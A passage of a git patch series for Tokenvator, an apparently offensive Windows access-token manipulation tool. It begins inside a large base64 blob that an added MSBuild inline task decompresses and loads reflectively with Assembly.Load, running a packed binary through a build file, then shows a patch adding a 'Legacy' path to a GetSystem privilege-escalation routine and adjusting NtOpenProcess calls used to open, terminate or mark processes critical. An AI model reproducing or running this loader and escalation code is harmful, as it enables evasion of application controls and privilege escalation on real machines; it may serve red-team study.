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";
+                        byte[] bCompressedBin = Convert.FromBase64String(strCompressedBin);
+                        Console.WriteLine("[+] Compressed Sized: {0}", bCompressedBin.Length);
+                        
+                        byte[] Decompressed;
+                        using (MemoryStream msDecompressed = new MemoryStream())
+                        {
+                            using (MemoryStream msCompressed = new MemoryStream(bCompressedBin))
+                            {
+                                using (DeflateStream dstream = new DeflateStream(msCompressed, CompressionMode.Decompress))
+                                {
+                                    dstream.CopyTo(msDecompressed);
+                                }                              
+                            }
+                            Decompressed = msDecompressed.ToArray();
+                        }
+                        Console.WriteLine("[+] Decompressed Sized: {0}", Decompressed.Length);
+                        
+                        Assembly assembly = Assembly.Load(Decompressed);
+                        assembly.EntryPoint.Invoke(null, new object[] { args });
+                        return true;
+                    }
+                }
+            ]]>
+      </Code>
+    </Task>
+  </UsingTask>
+</Project>
\ No newline at end of file

From 48228c97de6412b441db2348bcedb984041f1cfe Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Tue, 21 Feb 2023 13:06:54 -0500
Subject: [PATCH 36/36] Add Legacy option to GetSystem

---
 Tokenvator.sln                                |  4 +-
 Tokenvator/MainLoop.Modules.cs                |  8 +--
 .../Plugins/AccessTokens/AccessTokens.cs      |  4 +-
 Tokenvator/Tokenvator.csproj                  | 53 ++-----------------
 4 files changed, 13 insertions(+), 56 deletions(-)

diff --git a/Tokenvator.sln b/Tokenvator.sln
index 2beb0ca..568adac 100644
--- a/Tokenvator.sln
+++ b/Tokenvator.sln
@@ -37,8 +37,8 @@ Global
 		Release-Net45|x86 = Release-Net45|x86
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{0A1ADFEC-C824-4B97-9241-41C00CC2B982}.Debug|Any CPU.ActiveCfg = Release|Any CPU
-		{0A1ADFEC-C824-4B97-9241-41C00CC2B982}.Debug|Any CPU.Build.0 = Release|Any CPU
+		{0A1ADFEC-C824-4B97-9241-41C00CC2B982}.Debug|Any CPU.ActiveCfg = Release|x64
+		{0A1ADFEC-C824-4B97-9241-41C00CC2B982}.Debug|Any CPU.Build.0 = Release|x64
 		{0A1ADFEC-C824-4B97-9241-41C00CC2B982}.Debug|ARM.ActiveCfg = Debug|Any CPU
 		{0A1ADFEC-C824-4B97-9241-41C00CC2B982}.Debug|ARM.Build.0 = Debug|Any CPU
 		{0A1ADFEC-C824-4B97-9241-41C00CC2B982}.Debug|ARM64.ActiveCfg = Debug|Any CPU
diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 50b0bc1..e74941c 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -320,7 +320,7 @@ private void _GetSystem()
             using (TokenInformation ti = new TokenInformation(currentProcessToken))
             {
                 ti.SetWorkingTokenToSelf();
-                if (!ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME))
+                if (!ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME) || cLP.Legacy)
                 {
                     using (NamedPipes np = new NamedPipes())
                     {
@@ -632,7 +632,7 @@ private void _IsCriticalProcess()
                 var fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
 
                 MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
-                MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
+                ntbasic.CLIENT_ID clientId = new ntbasic.CLIENT_ID
                 {
                     UniqueProcess = new IntPtr(cLP.ProcessID)
                 };
@@ -1048,7 +1048,7 @@ private void _SetCriticalProcess()
                 MonkeyWorks.ntdll.NtOpenProcess fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
 
                 MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
-                MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
+                ntbasic.CLIENT_ID clientId = new ntbasic.CLIENT_ID
                 {
                     UniqueProcess = new IntPtr(cLP.ProcessID)
                 };
@@ -1341,7 +1341,7 @@ private void _Terminate()
             var fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
 
             MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
-            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
+            ntbasic.CLIENT_ID clientId = new ntbasic.CLIENT_ID
             {
                 UniqueProcess = new IntPtr(cLP.ProcessID)
             };
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 58dc720..9b041c5 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -320,7 +320,7 @@ public bool OpenProcessToken(int processId, bool showOutput = true)
 
             IntPtr hProcess = new IntPtr();
             MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
-            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
+            ntbasic.CLIENT_ID clientId = new ntbasic.CLIENT_ID
             {
                 UniqueProcess = new IntPtr(processId)
             };
@@ -464,7 +464,7 @@ public bool OpenThreadToken(uint threadId, uint permissions, bool showOutput = t
 
             IntPtr hThread = new IntPtr();
             MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
-            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
+            ntbasic.CLIENT_ID clientId = new ntbasic.CLIENT_ID
             {
                 UniqueThread = new IntPtr(threadId)
             };
diff --git a/Tokenvator/Tokenvator.csproj b/Tokenvator/Tokenvator.csproj
index a264b7c..ce58a28 100644
--- a/Tokenvator/Tokenvator.csproj
+++ b/Tokenvator/Tokenvator.csproj
@@ -39,50 +39,6 @@
     <UseApplicationTrust>false</UseApplicationTrust>
     <BootstrapperEnabled>true</BootstrapperEnabled>
   </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
-    <DebugSymbols>true</DebugSymbols>
-    <DebugType>full</DebugType>
-    <Optimize>false</Optimize>
-    <OutputPath>bin\Debug\</OutputPath>
-    <DefineConstants>DEBUG;TRACE</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-    <Prefer32Bit>false</Prefer32Bit>
-    <LangVersion>5</LangVersion>
-  </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
-    <DebugType>pdbonly</DebugType>
-    <Optimize>true</Optimize>
-    <OutputPath>bin\Release\</OutputPath>
-    <DefineConstants>TRACE</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-    <Prefer32Bit>false</Prefer32Bit>
-    <LangVersion>5</LangVersion>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug-Net45|AnyCPU'">
-    <OutputPath>bin\Debug-Net45\</OutputPath>
-    <TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
-    <DefineConstants>TRACE</DefineConstants>
-    <Optimize>true</Optimize>
-    <DebugType>pdbonly</DebugType>
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <ErrorReport>prompt</ErrorReport>
-    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
-    <LangVersion>5</LangVersion>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release-Net45|AnyCPU'">
-    <OutputPath>bin\Release-Net45\</OutputPath>
-    <TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
-    <DefineConstants>TRACE</DefineConstants>
-    <Optimize>true</Optimize>
-    <DebugType>pdbonly</DebugType>
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <ErrorReport>prompt</ErrorReport>
-    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
-    <LangVersion>5</LangVersion>
-    <Prefer32Bit>false</Prefer32Bit>
-  </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
     <DebugSymbols>true</DebugSymbols>
     <OutputPath>bin\x64\Debug\</OutputPath>
@@ -94,7 +50,6 @@
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
     <OutputPath>bin\x64\Release\</OutputPath>
-    <DefineConstants>TRACE</DefineConstants>
     <Optimize>true</Optimize>
     <DebugType>pdbonly</DebugType>
     <PlatformTarget>x64</PlatformTarget>
@@ -107,18 +62,17 @@
     <Optimize>true</Optimize>
